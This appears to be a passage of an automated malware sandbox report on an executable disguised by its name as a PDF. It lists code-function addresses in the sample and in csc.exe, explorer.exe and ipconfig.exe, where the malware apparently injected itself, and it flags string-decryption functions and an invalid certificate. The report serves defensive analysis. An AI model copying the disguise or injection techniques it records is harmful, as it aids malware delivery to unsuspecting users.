Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7862F80	0_2_00007FF7D7862F80
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7883DF0	0_2_00007FF7D7883DF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7860CA0	0_2_00007FF7D7860CA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D787AC50	0_2_00007FF7D787AC50
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7858BC4	0_2_00007FF7D7858BC4
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7884BC0	0_2_00007FF7D7884BC0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D788DB50	0_2_00007FF7D788DB50
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7870B90	0_2_00007FF7D7870B90
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7885B10	0_2_00007FF7D7885B10
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7875A30	0_2_00007FF7D7875A30
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7858A20	0_2_00007FF7D7858A20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D791B9B0	0_2_00007FF7D791B9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0040102E	6_2_0040102E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041EC28	6_2_0041EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041DD0E	6_2_0041DD0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041E5DE	6_2_0041E5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00409E5D	6_2_00409E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00409E60	6_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D6C0	6_2_0041D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0D5B0	6_2_05A0D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A30591	6_2_05A30591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27571	6_2_05A27571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1E4F6	6_2_05A1E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F43F	6_2_05A2F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A22446	6_2_05A22446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F7B0	6_2_05A2F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596C7C0	6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05994750	6_2_05994750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598C6E0	6_2_0598C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A301AA	6_2_05A301AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597B1B0	6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A281CC	6_2_05A281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960100	6_2_05960100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F8158	6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B16B	6_2_05A3B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A516C	6_2_059A516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F0E0	6_2_05A2F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A270E9	6_2_05A270E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F0CC	6_2_05A1F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B739A	6_2_059B739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A303E6	6_2_05A303E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E3F0	6_2_0597E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2132D	6_2_05A2132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D34C	6_2_0595D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2A352	6_2_05A2A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059752A0	6_2_059752A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A112ED	6_2_05A112ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B2C0	6_2_0598B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F02C0	6_2_059F02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A10274	6_2_05A10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05988DBF	6_2_05988DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598FDC0	6_2_0598FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596ADE0	6_2_0596ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597AD00	6_2_0597AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27D73	6_2_05A27D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973D40	6_2_05973D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A21D5A	6_2_05A21D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A10CB5	6_2_05A10CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FCF2	6_2_05A2FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960CF2	6_2_05960CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970C00	6_2_05970C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E9C32	6_2_059E9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971F92	6_2_05971F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FFB1	6_2_05A2FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EEFA0	6_2_059EEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962FC8	6_2_05962FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597CFE0	6_2_0597CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990F30	6_2_05990F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FF09	6_2_05A2FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B2F28	6_2_059B2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4F40	6_2_059E4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05982E90	6_2_05982E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05979EB0	6_2_05979EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2CE93	6_2_05A2CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2EEDB	6_2_05A2EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2EE26	6_2_05A2EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970E59	6_2_05970E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3A9A6	6_2_05A3A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059729A0	6_2_059729A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05979950	6_2_05979950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B950	6_2_0598B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05986962	6_2_05986962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059568B8	6_2_059568B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E8F0	6_2_0599E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059738E0	6_2_059738E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD800	6_2_059DD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05972840	6_2_05972840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597A840	6_2_0597A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598FB80	6_2_0598FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ADBF9	6_2_059ADBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E5BF0	6_2_059E5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A26BD7	6_2_05A26BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FB76	6_2_05A2FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2AB40	6_2_05A2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0DAAC	6_2_05A0DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596EA80	6_2_0596EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B5AA0	6_2_059B5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1DAC6	6_2_05A1DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27A46	6_2_05A27A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FA49	6_2_05A2FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E3A6C	6_2_059E3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A036	6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588E5CD	6_2_0588E5CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05881082	6_2_05881082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588B232	6_2_0588B232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05882D02	6_2_05882D02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05888912	6_2_05888912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05885B30	6_2_05885B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05885B32	6_2_05885B32
Source: C:\Windows\explorer.exe	Code function: 7_2_10171036	7_2_10171036
Source: C:\Windows\explorer.exe	Code function: 7_2_10168082	7_2_10168082
Source: C:\Windows\explorer.exe	Code function: 7_2_1016F912	7_2_1016F912
Source: C:\Windows\explorer.exe	Code function: 7_2_10169D02	7_2_10169D02
Source: C:\Windows\explorer.exe	Code function: 7_2_101755CD	7_2_101755CD
Source: C:\Windows\explorer.exe	Code function: 7_2_10172232	7_2_10172232
Source: C:\Windows\explorer.exe	Code function: 7_2_1016CB32	7_2_1016CB32
Source: C:\Windows\explorer.exe	Code function: 7_2_1016CB30	7_2_1016CB30
Source: C:\Windows\explorer.exe	Code function: 7_2_106EB036	7_2_106EB036
Source: C:\Windows\explorer.exe	Code function: 7_2_106E2082	7_2_106E2082
Source: C:\Windows\explorer.exe	Code function: 7_2_106E3D02	7_2_106E3D02
Source: C:\Windows\explorer.exe	Code function: 7_2_106E9912	7_2_106E9912
Source: C:\Windows\explorer.exe	Code function: 7_2_106EF5CD	7_2_106EF5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_106EC232	7_2_106EC232
Source: C:\Windows\explorer.exe	Code function: 7_2_106E6B32	7_2_106E6B32
Source: C:\Windows\explorer.exe	Code function: 7_2_106E6B30	7_2_106E6B30
Source: C:\Windows\explorer.exe	Code function: 7_2_1124C232	7_2_1124C232
Source: C:\Windows\explorer.exe	Code function: 7_2_11246B30	7_2_11246B30
Source: C:\Windows\explorer.exe	Code function: 7_2_11246B32	7_2_11246B32
Source: C:\Windows\explorer.exe	Code function: 7_2_11243D02	7_2_11243D02
Source: C:\Windows\explorer.exe	Code function: 7_2_11249912	7_2_11249912
Source: C:\Windows\explorer.exe	Code function: 7_2_1124F5CD	7_2_1124F5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_1124B036	7_2_1124B036
Source: C:\Windows\explorer.exe	Code function: 7_2_11242082	7_2_11242082
Source: C:\Windows\explorer.exe	Code function: 7_2_112E5D02	7_2_112E5D02
Source: C:\Windows\explorer.exe	Code function: 7_2_112EB912	7_2_112EB912
Source: C:\Windows\explorer.exe	Code function: 7_2_112F15CD	7_2_112F15CD
Source: C:\Windows\explorer.exe	Code function: 7_2_112ED036	7_2_112ED036
Source: C:\Windows\explorer.exe	Code function: 7_2_112E4082	7_2_112E4082
Source: C:\Windows\explorer.exe	Code function: 7_2_112E8B32	7_2_112E8B32
Source: C:\Windows\explorer.exe	Code function: 7_2_112E8B30	7_2_112E8B30
Source: C:\Windows\explorer.exe	Code function: 7_2_112EE232	7_2_112EE232
Source: C:\Windows\explorer.exe	Code function: 7_2_11445D02	7_2_11445D02
Source: C:\Windows\explorer.exe	Code function: 7_2_1144B912	7_2_1144B912
Source: C:\Windows\explorer.exe	Code function: 7_2_114515CD	7_2_114515CD
Source: C:\Windows\explorer.exe	Code function: 7_2_1144D036	7_2_1144D036
Source: C:\Windows\explorer.exe	Code function: 7_2_11444082	7_2_11444082
Source: C:\Windows\explorer.exe	Code function: 7_2_11448B30	7_2_11448B30
Source: C:\Windows\explorer.exe	Code function: 7_2_11448B32	7_2_11448B32
Source: C:\Windows\explorer.exe	Code function: 7_2_1144E232	7_2_1144E232
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE39FE	9_2_00DE39FE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035BD34C	9_2_035BD34C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368A352	9_2_0368A352
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368132D	9_2_0368132D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036903E6	9_2_036903E6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DE3F0	9_2_035DE3F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0361739A	9_2_0361739A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03670274	9_2_03670274
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036712ED	9_2_036712ED
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EB2C0	9_2_035EB2C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036502C0	9_2_036502C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D52A0	9_2_035D52A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0369B16B	9_2_0369B16B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0360516C	9_2_0360516C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035BF172	9_2_035BF172
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03658158	9_2_03658158
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C0100	9_2_035C0100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366A118	9_2_0366A118
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036881CC	9_2_036881CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036901AA	9_2_036901AA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DB1B0	9_2_035DB1B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036870E9	9_2_036870E9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F0E0	9_2_0368F0E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D70C0	9_2_035D70C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367F0CC	9_2_0367F0CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035F4750	9_2_035F4750
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0770	9_2_035D0770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CC7C0	9_2_035CC7C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F7B0	9_2_0368F7B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036816CC	9_2_036816CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EC6E0	9_2_035EC6E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687571	9_2_03687571
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0535	9_2_035D0535
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366D5B0	9_2_0366D5B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03690591	9_2_03690591
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03682446	9_2_03682446
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C1460	9_2_035C1460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F43F	9_2_0368F43F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367E4F6	9_2_0367E4F6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FB76	9_2_0368FB76
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368AB40	9_2_0368AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03645BF0	9_2_03645BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0360DBF9	9_2_0360DBF9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03686BD7	9_2_03686BD7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EFB80	9_2_035EFB80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03643A6C	9_2_03643A6C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FA49	9_2_0368FA49
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687A46	9_2_03687A46
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367DAC6	9_2_0367DAC6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03615AA0	9_2_03615AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366DAAC	9_2_0366DAAC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CEA80	9_2_035CEA80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D9950	9_2_035D9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EB950	9_2_035EB950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E6962	9_2_035E6962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0369A9A6	9_2_0369A9A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D29A0	9_2_035D29A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D2840	9_2_035D2840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DA840	9_2_035DA840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0363D800	9_2_0363D800
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035FE8F0	9_2_035FE8F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D38E0	9_2_035D38E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035B68B8	9_2_035B68B8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03644F40	9_2_03644F40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03612F28	9_2_03612F28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FF09	9_2_0368FF09
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035F0F30	9_2_035F0F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C2FC8	9_2_035C2FC8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DCFE0	9_2_035DCFE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0364EFA0	9_2_0364EFA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D1F92	9_2_035D1F92
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FFB1	9_2_0368FFB1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0E59	9_2_035D0E59
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368EE26	9_2_0368EE26
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368EEDB	9_2_0368EEDB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E2E90	9_2_035E2E90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D9EB0	9_2_035D9EB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368CE93	9_2_0368CE93
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687D73	9_2_03687D73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D3D40	9_2_035D3D40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03681D5A	9_2_03681D5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DAD00	9_2_035DAD00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EFDC0	9_2_035EFDC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CADE0	9_2_035CADE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E8DBF	9_2_035E8DBF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03649C32	9_2_03649C32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0C00	9_2_035D0C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FCF2	9_2_0368FCF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C0CF2	9_2_035C0CF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03670CB5	9_2_03670CB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5E5DE	9_2_00C5E5DE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C42D90	9_2_00C42D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5DD0E	9_2_00C5DD0E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5D6C0	9_2_00C5D6C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C49E5D	9_2_00C49E5D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C49E60	9_2_00C49E60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C42FB0	9_2_00C42FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A036	9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03985B30	9_2_03985B30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03985B32	9_2_03985B32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398B232	9_2_0398B232
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03988912	9_2_03988912
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03981082	9_2_03981082
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398E5CD	9_2_0398E5CD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03982D02	9_2_03982D02

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: String function: 00007FF7D785C9D0 appears 63 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03617E54 appears 96 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 035BB970 appears 268 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0364F290 appears 105 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03605130 appears 36 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0363EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059B7E54 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059EF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 0595B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059DEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059A5130 appears 36 times

PE / OLE file has an invalid certificate

